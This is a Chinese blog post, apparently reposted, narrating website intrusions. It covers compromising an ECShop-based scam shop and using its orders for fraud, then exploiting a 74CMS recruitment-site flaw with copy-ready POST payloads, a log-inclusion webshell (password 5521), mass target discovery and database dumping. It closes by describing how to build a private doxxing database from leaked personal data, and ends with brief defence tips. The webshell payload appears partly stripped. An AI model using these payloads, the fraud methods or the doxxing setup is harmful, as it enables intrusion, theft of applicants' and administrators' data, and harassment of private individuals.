写在前面,图片全部打码,所涉及到的漏洞,均已告知网站管理员。
为了不对别人的业务造成影响,特地延迟发文。
没什么技术含量,三流技术水平就能做到本文的效果。
一)被骗的小粉丝
事情的起因很简单,小女粉比较虚荣,买了个高仿手表。
懂行的人都懂,高仿表并不便宜,价格普遍在千元以上。
买回来之后,表不走了,想退货,但卖家只换不退,一来二去,被拉黑了。
哥哥瞅了一眼照片,妹子颜值不错,色迷心窍,遂帮之。
第一步,先收集资料,打开网站任意页面,观察网址,一般能看出对方用了什么程序。
http://xxxx.com/goods-12345.html
作为一个老司机,观察网址的后半部分”goods-12345.html” ,骗子网站应该用的是ecshop这套源码。
新手可以使用在线指纹识别平台,查询目标网站用的程序。
指纹查询:http://whatweb.bugscaner.com/look/
查骗子网站的IP地址和机房信息。
在线查询:ping.chinaz.com
IP地址没变化,说明骗子网站没有使用CDN。
IP地址是香港,大概率没什么防御。
最后一步,收集此IP开放了哪些端口,每个端口都代表着一种服务,开放的端口越多,我们入侵的机会就越多。
随便找个端口扫描软件,输入IP地址,开始扫描,成功得到目标IP的端口。
在浏览器输入IP和端口号,看看有什么反应。
从截图能看出来,对方的服务器是linux系统,安装了宝塔面板。
目前已知目标网站的程序源码、真实IP地址、机房信息、主机系统、主机安装的软件,可以开搞了。
百度搜索“程序名 漏洞”,收集整理ecshop相关的一切漏洞信息!
ECShop <= 2.x/3.6.x/3.0.x 漏洞复现:http://r3start.net/index.php/2018/09/04/146
ECShop全系列版本远程代码执行高危漏洞分析 实战提权:https://www.freebuf.com/column/185049.html
ECshop 支付宝插件,sql注入漏洞: https://blog.csdn.net/u011721501/article/details/40342797
ECshop 漏洞合集:https://www.seebug.org/appdir/ecshop
2.x/3.6.x/3.0.x 这几个版本,2018年爆出高危漏洞,直接就能拿下网站管理权限。
《实战黑客批量入侵 轻松拿下1000个网站》无极领域这篇专门写过,一键获取各类购物网站的数据库,有图有真相。
下图是ecshop的最新漏洞信息。
下图是ecshop官网公布的程序更新记录。
2020.12.1,ecshopV4.1.0爆出个SQL注入漏洞。
2020.12.30,ecshop官方发布了升级补丁。
轻车熟路,十多分钟时间,就拿到了所有想要的信息。
现在,只要知道骗子网站的版本,就能用相应的漏洞进行攻击。
哥哥又使出了目测大法,这个网站实在是太丑了,猜测应该是旧版源码,2.x 或 3.6.x版本。
直接使用查到的漏洞硬上,详细操作方法,上面的链接都有,不再赘述。
如图,宝塔防火墙拦截了攻击代码…
百度搜索“绕过宝塔防火墙”,现成的方案,现学现卖,绕过防火墙,成功获取网站权限。
下载骗子网站的源码,发现有很多老弟入侵这个网站,全部被防火墙拦截了…
打开源码的数据库配置文件,找到若干明文密码。
登陆网站后台,看看订单列表页,居然真的有人买…
还有很多人留言问怎么购买…
这个网站采用,货到付款的形式发货。
黑吃黑的方法有两种:
截单法:监控对方的订单,提前发货,这样便能截单,一单500元以上的利润。
替换法:许多网站会留微信二维码,让客户加微信咨询,只需换成自己的二维码,就能截取对方的客户。
事了拂衣去,深藏功与名。
二)招聘网信息泄露
骑士CMS是一套招聘网站源码,国内很多招聘网站都在用。
最近这套程序爆出漏洞,哥哥第一时间测试,现场极其惨烈。
漏洞分析:https://xz.aliyun.com/t/8520
大神的漏洞分析非常完整,但手段不够犀利,其实有更简单,更小白的入侵方式,3秒搞定一个网站。
既然已经知道这套源码有漏洞,那么只要找出使用这套源码的招聘网站,就能批量入侵。
搜索神器fofa:https://fofa.so/
常规搜索引擎,用来搜索网页内容。
fofa搜索引擎,可以从代码层面搜索,能搜出所有使用特定代码的网站,可惜是收费的,偶尔用一次,划不来开会员。
作为一个老司机,不想花钱,就得动脑子。
先打开骑士CMS的官网,找到其演示网站,分析页面特征。
发现有个“HR工具箱”的页面,平时在其他网站很少见到,应该算是一个特征。
复制其中一段比较有代表性的文字,直接百度搜索,果然找到很多招聘网站。
连续尝试多次,全部失败… 哥哥一脸懵逼,哪里做错了?
后来发现,原来另一套招聘源码“PHPyun”也有这个页面,估计同行互相模仿…
看来得换个特征,许多网址URL有各自的特点,点击演示网站的各个页面,找比较有代表性的URL。
接下来,使用搜索指令“inurl:XXXX”,查找相同URL的网站,如下图。
这次找对了,这些网站全部是骑士CMS的源码。
打开火狐浏览器,安装插件“hackbar”。
1.打开目标网站。
2.按F12进入调试模式,点击”hackbar”插件。
3.点击“Load URL”加载要攻击的网址。
4.手动给加载的网址末尾,加入代码:index.php?m=home&a=assign_resume_tpl
如:http:www.xxx.com/index.php?m=home&a=assign_resume_tpl
5.勾选“post data”选项,在出现的方框中输入攻击代码,下面两行,任意一个都行。
variable=1&tpl=
variable=1&tpl=/r/n<qscms/company_show 列表名=”info” 企业id=”$_GET[‘id’]”/>
6. 点击“Execute”,发送攻击指令,如果出现上图的“页面错误”,证明存在漏洞。
7. 将上一步“Post data”中的代码,换成“variable=1&tpl=./data/Runtime/Logs/Home/21_01_02.log”,如果出现如下页面,那么此网站必然有漏洞。
variable=1&tpl=./data/Runtime/Logs/Home/21_01_01.log
代码中“21_01_01”代表攻击当天的时间。
如果是2021年1月6日,那么攻击时就要改成。
variable=1&tpl=./data/Runtime/Logs/Home/21_01_06.log
通过上面的步骤,我们仅仅只是验证网站存在漏洞,接下来要开始获取网站管理权限。
具体细节参考上面的第5步,换个攻击代码即可。
在方框中输入下面的攻击代码,点击“Execute”,发送攻击指令。
variable=1&tpl=”)?>; ob_flush();?>
这个攻击指令的意思是,在网站目录创建一个名为“sys.php”文件,文件内容是一段木马“”,木马的密码是5521。
最后,直接使用第7步的代码,就能完成攻击。
variable=1&tpl=./data/Runtime/Logs/Home/21_01_02.log
使用“中国蚁剑”,就能进入网站内部。
中国蚁剑:https://github.com/AntSwordProject/AntSword-Loader
添加木马地址:www.xxxx.com/sys.php 密码:5521
成功获取多个招聘网站的权限,想进入网站数据库,先要找到数据库密码。
百度搜索“骑士CMS 数据库文件”,知道了文件目录,然后在招聘网源码 找出数据库文件。
这个文件里面有数据库用户名和密码,我们用得到的密码连接数据库…
如下,是数据库管理页面,可以随便查管理员/用户的所有信息,图中是管理员的密码字段,可以一键导出所有数据。
整个过程可以实现完全自动化,批量入侵,参考无极领域之前的文章。
给管理员发个邮件,通知对方网站存在漏洞。
三)灰色产业链
各类数据遍地都是,主要用途是营销和诈骗。
你能想到的,跨越地区年龄,任何数据,都有人在暗网出售。
全国上亿车主的信息。
400万带身份证 姓名 性别 地址 的信息。
全国知名大型招聘网站都被黑客搞过,数亿份包含所有信息的简历全部泄露。
主流大型网站,数亿份包含密码的数据,全部泄露。
这一切,花点钱就能买到。
除了营销外,这些数据还有个最大的功能:社工!
简而言之,除非对方不上网,否则可以查到任何人的个人信息。
微博的喷子很多,顺手就能查到对方的手机号…
Q群内也经常有人撕逼,顺手就能查到对方的曾经用过的密码、注册过哪些网站…
很多平台都提供收费查询,效果如下:
查询毕竟要花钱,一些人会选择自建社工库,这样就能无限随便查任何人。
一个普通配置的电脑,配个大点的硬盘,将各种数据库全部下载到硬盘。
安装一款全文搜索软件即可,可选的软件很多 AnyTXT 、BBdoc、filelocator、DocFetcher…
一键批量搜索硬盘的所有文件,可以穿透文档,直接搜索文档内部的文字,支持搜索TXT、Word、Excel、PPT、PDF、HTML、Python…. 各种文件格式。
如此简单,毫无技术含量。
四)防御
网站尽量用大服务商的主机,阿里云是真的厉害,能拦截大多数攻击。
安全狗、D盾、宝塔 都提供免费的防火墙,效果很好。
个人隐私泄露,这个是不可逆的,改掉你现在用的所有密码,采用密码分级制度,支付、社交、临时… 根据重要程度,分别用不同的密码。
为了防止被社工,可以发布一些假个人信息。
以上,能阻止大多数攻击,普通个人做到这一步,就足够了。
对大神来说,一切防御都是笑话。
内容出处:,
声明:本网站所收集的部分公开资料来源于互联网,转载的目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。如果您发现网站上有侵犯您的知识产权的作品,请与我们取得联系,我们会及时修改或删除。文章链接:http://www.yixao.com/customer/21551.html
微信扫一扫
支付宝扫一扫
相关推荐
-
如何评价用户体验的好坏?
所谓的用户体验,其实就是让用户”习惯”, Don’t make user think. 这个是终极目标啦,随着产品的不断的改善,用户体验也在随之变化。但是,如果你在做一款产品,所谓…
-
vue、react和angular学哪个更容就业?
对于大多数人来说,掌握一门语言或技术,首当是解决生存或就业问题。 下图是前段时间在微博发起的一个投票结果 明显可以看出Vue比较好就业,尤其对刚毕业或前端小白来说,学习Vue门槛相…
-
用户体验是电子商务网站成败的主要因素
用户体验不好,会导致什么样的结果?很简单,让商机瞬间消失,让潜在客户不断丢失。国庆期间什么都好卖,对于商家来说,是名付其实的黄上海网站建设金周。而在国庆前夕,最火爆的无疑还是机票、火车票。“到哪去”网站没有直接出售机票,它只作为信息发布平台,将网络上的票务信息组合起来发布,供用户了解票务信息。
-
B2C网站当当网网站用户体验评析
笔者以不同用户角色分别进行了多种方式及渠道的体验,诸如购物、收藏、缺货登记、合并购买等等。接下来的几天将逐一进行分析评测。当当网的购物流程大体如下图所示: 模糊搜索产生的问题。
-
2020天猫双11前端体系大揭秘–4982亿背后的前端技术
今年双11的整体节奏从之前的“光棍节”变为“双节棍”,具体业务上也有很多变化和调整,应了阿里的土话“唯一不变的是变化”。面对这些变化,是挑战也是机会,我们要做的就是,“既要”高效支…
-
ios系统和安卓系统在交互层面上有何区别?
1.导航逻辑差异 ios没有实体返回键,所有返回都是通过导航栏的back按钮返回。所以,ios应用大多数情况下,只提供单一路径,无论什么样的程序,都只有一个窗口,这个窗口用于放置程…
-
QQ群人数可以升级到5000人了 还有多少人玩QQ群?
昨天下午QQ群主助手发布消息称:QQ全新上线上线认证群,帮你解决群人数不够、群被假冒、搜索排名太落后等一系列问题。 QQ群认证关闭了很长一段时间,现如今又被提出,不过认证条件是:Q…
-
入侵某集团招聘网站的全过程
一)入侵小说网 当一切入侵方法无效时,使用暴力破解,无限穷举,尝试100亿次,总能找到正确的密码。 100亿次显然太多了,因为人们常用的密码极有规律,将生日、QQ号、幸运数字、手机…
-
企业网站该如何提高用户体验
简明的说就是用户对网站需求和网站的吸引度,如何提高用户体验,是网站的头等大事,搜索引擎优化,讲究对网站功能、网站结构、网页布局、网站内容综合性的设计。而用户体验讲究从网站印象、网站制作的功能、网站建设实用性、网站内容等综合因素来改善网站环境,提高用户体验,合理的推广与提高网站用户体验,是提高网站转换率(把流量转化为有效客户的比率)的重要因素。
-
深度学习算法完整简介
本文的主要目标是让您对深度学习领域有一个整体了解,并帮助您了解每种特定情况下应使用的算法。 神经网络:基础 神经网络是一个具有相互连接的节点的计算系统,其节点的工作方式更像是人脑中…